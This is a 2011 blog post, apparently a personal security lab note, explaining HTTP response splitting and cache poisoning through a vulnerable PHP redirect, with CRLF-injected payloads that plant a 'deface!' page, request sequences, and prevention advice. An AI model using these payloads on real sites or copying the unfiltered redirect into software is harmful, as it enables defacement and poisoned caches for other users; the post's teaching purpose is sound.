Wednesday, July 13, 2011

HTTP cache poisioning

HTTP response spilitting

First, we watch one source code:
$ cat redir.php
header ("Location: " . $_GET['page']);
?>

"page" argument will be got from end-user and redirect (302) to another page. Ex:

redir.php?page=index.php
redir.php?page=test.html

Now, we will talk about http request. In normally, if you request redir.php?page=test.html, http request like that:
GET http://localhost/redir.php?site=test.html
Host: localhost
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

We will go to test.html. Notice to "page" variable. It is not filtered. So end-user can modify it.
Using CR (%0d) and LF (%0a), attacker can control http request, generate two response to one request. How to do that?

this is page variable:
?page=test.html
The resulting answer from the vulnerable application:
HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: http://localhost/?page=test.html

will be modify to:
?page=test.html%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aConte
nt-Length:%2035%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface!

The resulting answer from the vulnerable application:
HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: http://localhost/?page=test.html
Content-Length: 0

HTTP/1.1 200 OK
Content-Length: 35
Content-Type: text/html
deface!

Web cache will see two different response. After the first request, asking for /test.html, web cache see second request match with the second response and cache its content
Woo!. all request directed to test.html passing through that web cache will receive the "deface!" message.
Most header candidates for this attack are:
-Location ( in this example)
-Set-Cookie

------------------------------------------------------------------------------------------------------------------------
That is http response splitting. Now, we talk about http cache poisioning. Cache poisioninh use response splitting to attack:
First: remove page from the cache
GET http://localhost/index.html HTTP/1.1
Pragma: no-cache
Host: localhost
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

Notice to: Pragma: no-cache. Another header: Cache-Control: no-cache wiil remove the page from cache

Second: using HTTP Response Splitting we force cache server to generate two responses to one request
GET http://localhost/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface!HTTP/1.1
Host: localhost
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

You can use url decode to see header:
http://localhost/redir.php?site= Content-Length: 0  HTTP/1.1 200 OK Last-Modified: Mon, 27 Oct 2014 14:50:18 GMT Content-Length: 20 Content-Type: text/html  deface!HTTP/1.1
Notice to: Last-Modified, it set the future time. So, web cache know that is newest cache, get it from cache memory

Final: sending request for the page, which we want to replace in the cache of the server
GET http://localhost/index.html HTTP/1.1
Host: localhost
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

The cache server should match the second answer from the request #2 to the request #3. In this way we've replaced the cache content.
But it is theory.
Prevent:
Input Validation: Filter CR LF character.
In my idea: Do not use direct variable from untrust source.
Ex: index.php?language=en
You can use switch:
switch($lang)
{
"en": go to english page;
"jp": go to japan page;
"fr": go to france page;
}
References:
https://www.owasp.org/index.php/HTTP_Response_Splitting
https://www.owasp.org/index.php/Cache_Poisoning
https://www.owasp.org/index.php/Cross-User_Defacement
------------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.  

No comments:

Install Xposed Inspector and Frida on Genymotion

Today i had some work with android. So i need trace application. I found 2 nice tool can help me: Xposed Inspector and Frida. To setup ther...